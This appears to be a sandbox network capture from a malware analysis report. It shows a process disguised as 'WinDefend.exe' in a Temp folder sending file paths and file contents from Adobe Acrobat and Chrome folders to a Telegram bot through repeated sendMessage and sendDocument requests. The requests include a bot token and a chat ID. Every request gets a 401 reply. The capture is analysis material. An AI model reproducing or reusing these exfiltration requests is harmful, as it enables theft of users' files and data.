2024-05-23 13:35:15 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:15 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.5	61194	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:16 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 185 Expect: 100-continue
2024-05-23 13:35:16 UTC	185	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 52 48 50 5f 69 63 6f 6e 73 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 52 48 50 5f 69 63 6f 6e 73 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 30 30 39 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+RHP_icons.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5CRHP_icons.png%0ASize%3A+1009+B
2024-05-23 13:35:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:16 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:16 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	61195	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:16 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:16 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 34 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+48.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:16 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:16 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
150	192.168.2.5	61196	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:16 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="4dba4b66-c6e2-482a-bf92-386954751bd6" Host: api.telegram.org Content-Length: 20219 Expect: 100-continue
2024-05-23 13:35:16 UTC	40	OUT	Data Raw: 2d 2d 34 64 62 61 34 62 36 36 2d 63 36 65 32 2d 34 38 32 61 2d 62 66 39 32 2d 33 38 36 39 35 34 37 35 31 62 64 36 0d 0a Data Ascii: --4dba4b66-c6e2-482a-bf92-386954751bd6
2024-05-23 13:35:16 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 32 39 31 39 32 62 61 36 66 33 63 36 61 38 64 32 34 32 34 36 34 64 36 34 36 64 34 61 64 36 33 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 32 39 31 39 32 62 61 36 66 33 63 36 61 38 64 32 34 32 34 36 34 64 36 34 36 64 34 61 64 36 33 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=229192ba6f3c6a8d242464d646d4ad63.png; filename*=utf-8''229192ba6f3c6a8d242464d646d4ad63.png
2024-05-23 13:35:16 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 48 00 00 01 4e 08 02 00 00 00 f2 cd 75 78 00 00 00 09 70 48 59 73 00 00 17 11 00 00 17 11 01 ca 26 f3 3f 00 00 20 00 49 44 41 54 78 9c ed dd 6d 70 1b f7 7d 2f fa df 3e e0 89 04 97 0f 12 ad 27 d8 b2 23 27 0c e1 d6 8a 6c e5 12 3d a9 8f e3 9c 4b 9e b6 ae ed 26 64 a7 55 94 69 4d 26 b7 54 5e 54 6c 7b 42 cd bd 1d 31 67 4e a8 99 9e b1 3a d3 50 6f 22 de c6 a4 7b 27 b1 d2 5e d2 a7 89 ab 36 17 6c 62 fb b8 4e c1 44 8e ca f4 18 34 13 2b 91 9d 95 25 8b 12 45 2c 41 3c ef ee 7d f1 27 57 4b 00 04 41 3c 2d 00 7e 3f 71 34 20 08 ec fe b1 00 f7 8b ff e3 72 b3 6f cb 04 00 50 b4 1b ef 27 7e f9 5e fc 83 f7 93 b9 1f e6 6a e0 f6 ec b7 df 7b d0 d1 dc 2c 96 6a d7 1c cf 09 bc 40 dc e6 8f d0 49 d3 34 4d d7 48 2f d5 3e ab 0b cf Data Ascii: PNGIHDRHNuxpHYs&? IDATxmp}/>'#'l=K&dUiM&T^Tl{B1gN:Po"{'^6lbND4+%E,A<}'WKA<-~?q4 roP'~^j{,j@I4MH/>
2024-05-23 13:35:16 UTC	4096	OUT	Data Raw: 8c c0 b2 cd 3c 78 44 4d d1 95 b7 b9 78 4c f7 1c 2c 55 91 2d 13 8f 11 9b 84 9e 4a 51 64 75 c3 af d4 14 ad 86 b7 b7 6e 5b 2a 45 85 55 67 77 75 53 9b 54 c8 13 01 00 4a ab 4a 83 8d b2 65 1b 9b bb 5d 4c b6 bd b3 b0 a1 11 52 be ca ad 86 f5 07 3b a8 56 2e e1 16 09 d3 ea 2a c5 63 b4 1a 26 35 c5 29 cb 56 17 08 00 a0 fa 54 f5 19 7d b3 6c 5b 5c 5c d4 74 3d f7 73 33 19 f5 36 73 b6 dd b9 c5 fd 24 4c 1d 0f 55 e9 25 dc d4 14 85 96 69 25 44 ab 61 c4 18 00 40 5e aa 3a d8 68 3d db 76 ed de 65 ac 6a 61 d4 db 0a c8 36 41 a4 87 0e eb 57 af d0 e2 8d bb 0d 74 f1 18 fd e4 4d ce 73 7f 15 35 4b aa 29 5a fc 80 42 cb 74 e7 96 f5 17 80 00 00 a8 2d d5 1e 6c 44 a4 e9 fa f2 9d e5 b6 b6 36 e3 d2 db a2 4d 6c 69 6d 59 5a ba 53 c0 d6 04 91 0e 75 90 c3 a9 cb 57 37 64 86 7c 95 5b ba 45 0f 76 Data Ascii: <xDMxL,U-JQdun[EUgwuSTJJe]LR;V.c&5)VT}l[\\t=s36s$LU%i%Da@^:h=veja6AWtMs5K)ZBt-lD6MlimYZSuW7d\|[Ev
2024-05-23 13:35:16 UTC	4096	OUT	Data Raw: 67 b7 db db da ec d1 68 34 1c 5e 2d 6b bb 9f dd 6e 77 bb 1b b3 2e 11 82 48 03 00 28 cc 8e 0e 36 26 1c 5e 8d c7 e2 cd cd cd 69 eb 77 b8 5c 2e 97 cb c5 ba b5 4a 1e 30 39 22 4d 55 d5 50 48 dd 27 4d 35 00 00 20 00 49 44 41 54 41 a4 01 00 14 06 c1 46 44 94 4c a5 6e dd be ed 76 37 36 36 34 a6 f5 72 b1 78 4b 25 53 ab 91 d5 78 2c 5e fc d0 12 a7 c3 d1 d0 d8 90 35 d2 74 4d 0f 87 c3 55 32 38 13 00 a0 46 21 d8 ee 0a 87 57 a3 d1 58 d6 a1 f6 a2 4d 6c 6e 6e a6 66 8a c7 e2 b1 78 2c 91 48 6e b7 89 d2 26 8a 0e a7 c3 e5 72 6d b6 2a 5a 64 35 12 0e 87 ab 76 aa 38 00 40 ad 40 b0 6d c0 9a 01 59 bc 65 ad 54 39 9c 0e b6 ae 95 aa aa 6c 72 74 32 95 52 55 35 33 e7 78 8e 13 6d 36 9b 28 8a 36 d1 6e b7 e7 58 e5 b3 02 9d 79 00 00 3b 07 82 2d 8b 44 22 b1 b4 94 b0 89 62 43 63 c3 66 13 a5 Data Ascii: gh4^-knw.H(6&^iw\.J09"MUPH'M5 IDATAFDLnv7664rxK%Sx,^5tMU28F!WXMlnnfx,Hn&rm*Zd5v8@@mYeT9lrt2RU53xm6(6nXy;-D"bCcf
2024-05-23 13:35:16 UTC	4096	OUT	Data Raw: f8 32 b0 53 40 57 57 81 e3 30 4b 5b 98 12 62 af 8b 9d f4 ad dd 08 ad 9f b8 27 26 26 73 2f 35 52 12 ec 53 34 3a 7a 86 f5 ea 79 bd 9d fd fd fd e6 b3 7f 0e 6c 00 51 30 18 2c df 60 fd 52 ed a2 6a 3f 78 a5 85 60 83 1a e6 f5 76 fa 7c be ed ae 3c 92 b5 8e e5 f1 1c d8 d6 ae 0b f8 96 5d be c2 d4 2b 76 90 3d 1e 4f e6 01 29 c7 30 07 d6 50 3c 39 f9 02 6b 4a 1d 1e 3e 25 cb 27 b7 1c 10 3f 35 35 3d 3a 7a 86 15 89 bd 9b 8a a2 94 36 e1 ca b1 8b fa fe e0 21 d8 a0 f6 64 0e 2b cf 87 71 2a 3c 7b f6 b9 e2 4f 8b 5e 6f 67 30 38 3f 3f 5f e0 c9 a5 b4 85 29 21 9f af 8b 55 0e 8a 99 e1 54 92 8d 10 91 c7 e3 91 65 99 0d 46 2f 66 3b db da e3 c8 c8 e9 fe fe 67 c7 c6 ce f9 fd 33 63 63 e7 d2 1a 42 d3 c8 b2 cc 22 67 68 e8 6e 04 66 ae fd 56 8c d2 ee a2 6a 3f 78 a5 85 3e 36 d8 29 8c af a8 25 Data Ascii: 2S@WW0K[b'&&s/5RS4:zylQ0,`Rj?x`v\|<]+v=O)0P<9kJ>%'?55=:z6!d+q*<{O^og08??_)!UTeF/f;g3ccB"ghnfVj?x>6)%
2024-05-23 13:35:16 UTC	3459	OUT	Data Raw: 61 75 19 a0 94 8c 60 4b 26 93 ba 56 27 0d 0b d5 20 95 4c 2d 2d 2d 69 98 5d 00 96 8a 52 2c 1c 0e b7 b5 b5 89 36 74 24 6d 0a 4d 91 00 5b 53 55 15 a9 06 55 42 d3 f5 a5 a5 a5 2a 59 6e b8 3a 21 d8 00 b6 16 0e 87 91 6a 50 3d 34 f4 79 d9 4d 00 00 0d 1d 49 44 41 54 5d 0f 87 c3 56 97 a2 7a 21 d8 a0 26 39 5d ae 4a ee 0e 9d 6a 50 6d f0 99 cc 01 c1 06 35 69 9f e7 3e ab 8b 00 00 55 0a c1 56 b7 38 a2 7b d6 af a3 06 00 b0 73 20 d8 ea 13 c7 71 c4 71 0e 67 45 db eb 2a 69 bf e7 de 4a ae 36 62 b7 57 d1 72 41 00 84 cf 64 4e 08 b6 3a c4 71 1c 71 c4 f3 fc 7d 0f 3c 68 75 59 ca a5 75 57 3b 47 5c c5 b2 ad b1 a1 91 c7 aa 5d 50 35 78 8e 6b 6c 68 b4 ba 14 d5 0b c1 56 87 38 22 8e e3 38 8e 6f 69 db 65 75 59 ca e5 c0 7d f7 71 3c c7 b1 0c 2f 3f 8e e7 da da da aa e1 42 53 00 36 51 6c 6b Data Ascii: au`K&V' L---i]R,6t$mM[SUUBYn:!jP=4yMIDAT]Vz!&9]JjPm5i>UV8{s qqgEiJ6bWrAdN:qq}<huYuW;G\]P5xklhV8"8oieuY}q</?BS6Qlk
2024-05-23 13:35:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:16 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 34 64 62 61 34 62 36 36 2d 63 36 65 32 2d 34 38 32 61 2d 62 66 39 32 2d 33 38 36 39 35 34 37 35 31 62 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --4dba4b66-c6e2-482a-bf92-386954751bd6Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:16 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:16 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 34 64 62 61 34 62 36 36 2d 63 36 65 32 2d 34 38 32 61 2d 62 66 39 32 2d 33 38 36 39 35 34 37 35 31 62 64 36 2d 2d 0d 0a Data Ascii: --4dba4b66-c6e2-482a-bf92-386954751bd6--
2024-05-23 13:35:17 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:17 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
151	192.168.2.5	61197	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:17 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="493bae27-baed-45ba-a431-666d1abb483a" Host: api.telegram.org Content-Length: 1339 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
152	192.168.2.5	61198	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:17 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="010c8553-179d-4067-9227-25f779196e7b" Host: api.telegram.org Content-Length: 1685 Expect: 100-continue
2024-05-23 13:35:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:17 UTC	40	OUT	Data Raw: 2d 2d 30 31 30 63 38 35 35 33 2d 31 37 39 64 2d 34 30 36 37 2d 39 32 32 37 2d 32 35 66 37 37 39 31 39 36 65 37 62 0d 0a Data Ascii: --010c8553-179d-4067-9227-25f779196e7b
2024-05-23 13:35:17 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 34 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 34 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=48.png; filename*=utf-8''48.png
2024-05-23 13:35:17 UTC	1369	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 05 20 49 44 41 54 68 81 ed 9a 4f 68 1c 55 1c c7 bf bf df 9b 3f 3b 9b fd 93 84 6a 5a 34 a8 a5 1e 2c 16 14 8d a1 16 44 5b 14 0b 96 fa 87 d4 4b ef 22 a8 17 f5 62 8a 44 49 4f 45 0f 7a a8 27 3d 58 10 92 63 85 e2 41 ac 97 2a d4 52 44 d1 43 8b 7f a8 31 58 82 c6 24 dd 64 67 e7 bd 9f 87 99 d9 6e da 9d cd ce cc 66 83 d0 ef 32 2c cc bc f9 bd f7 79 bf f7 7e bf 37 6f 06 e8 46 33 13 aa ab 72 dd 8b fa 6e 68 d7 07 07 dd d2 a8 eb 61 31 5f 85 6a c0 96 0b 47 66 ff 8d ea 96 7c d6 ba 00 d8 3d b3 db f1 e4 be e3 ac f8 05 d1 a6 2a 02 02 24 75 0f 8a 01 d8 22 6d 00 9e bf 34 f7 de fc e4 b7 c7 31 01 85 59 e8 6c 4d 0f 95 3c 34 a6 c0 38 0b 19 7d fe b1 13 ee b0 f7 ba 5e 0d 86 40 f0 Data Ascii: PNGIHDR00W IDAThOhU?;jZ4,D[K"bDIOEz'=XcARDC1X$dgnf2,y~7oF3rnha1_jGf\|=$u"m41YlM<48}^@
2024-05-23 13:35:17 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 30 31 30 63 38 35 35 33 2d 31 37 39 64 2d 34 30 36 37 2d 39 32 32 37 2d 32 35 66 37 37 39 31 39 36 65 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --010c8553-179d-4067-9227-25f779196e7bContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:17 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:17 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 30 31 30 63 38 35 35 33 2d 31 37 39 64 2d 34 30 36 37 2d 39 32 32 37 2d 32 35 66 37 37 39 31 39 36 65 37 62 2d 2d 0d 0a Data Ascii: --010c8553-179d-4067-9227-25f779196e7b--
2024-05-23 13:35:18 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:18 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
153	192.168.2.5	61199	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:17 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:18 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 33 35 35 66 38 33 32 65 65 36 62 32 31 63 65 35 30 66 30 64 33 32 36 62 34 38 61 66 39 37 36 66 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 33 35 35 66 38 33 32 65 65 36 62 32 31 63 65 35 30 66 30 64 33 32 36 62 34 38 61 66 39 37 36 66 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 37 2b Data Ascii: chat_id=1655240967&text=File%3A+355f832ee6b21ce50f0d326b48af976f.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C355f832ee6b21ce50f0d326b48af976f.png%0ASize%3A+17+
2024-05-23 13:35:18 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:18 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
154	192.168.2.5	61201	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:18 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 189 Expect: 100-continue
2024-05-23 13:35:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:18 UTC	189	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 52 48 50 5f 69 63 6f 6e 73 5f 32 78 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 52 48 50 5f 69 63 6f 6e 73 5f 32 78 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+RHP_icons_2x.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5CRHP_icons_2x.png%0ASize%3A+1+KB
2024-05-23 13:35:18 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:18 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
155	192.168.2.5	61203	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:18 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:19 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 36 34 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+64.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:19 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:19 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
156	192.168.2.5	61204	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:19 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="294e053e-8942-432f-9378-79146a22301d" Host: api.telegram.org Content-Length: 18070 Expect: 100-continue
2024-05-23 13:35:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:19 UTC	40	OUT	Data Raw: 2d 2d 32 39 34 65 30 35 33 65 2d 38 39 34 32 2d 34 33 32 66 2d 39 33 37 38 2d 37 39 31 34 36 61 32 32 33 30 31 64 0d 0a Data Ascii: --294e053e-8942-432f-9378-79146a22301d
2024-05-23 13:35:19 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 33 35 35 66 38 33 32 65 65 36 62 32 31 63 65 35 30 66 30 64 33 32 36 62 34 38 61 66 39 37 36 66 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 33 35 35 66 38 33 32 65 65 36 62 32 31 63 65 35 30 66 30 64 33 32 36 62 34 38 61 66 39 37 36 66 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=355f832ee6b21ce50f0d326b48af976f.png; filename*=utf-8''355f832ee6b21ce50f0d326b48af976f.png
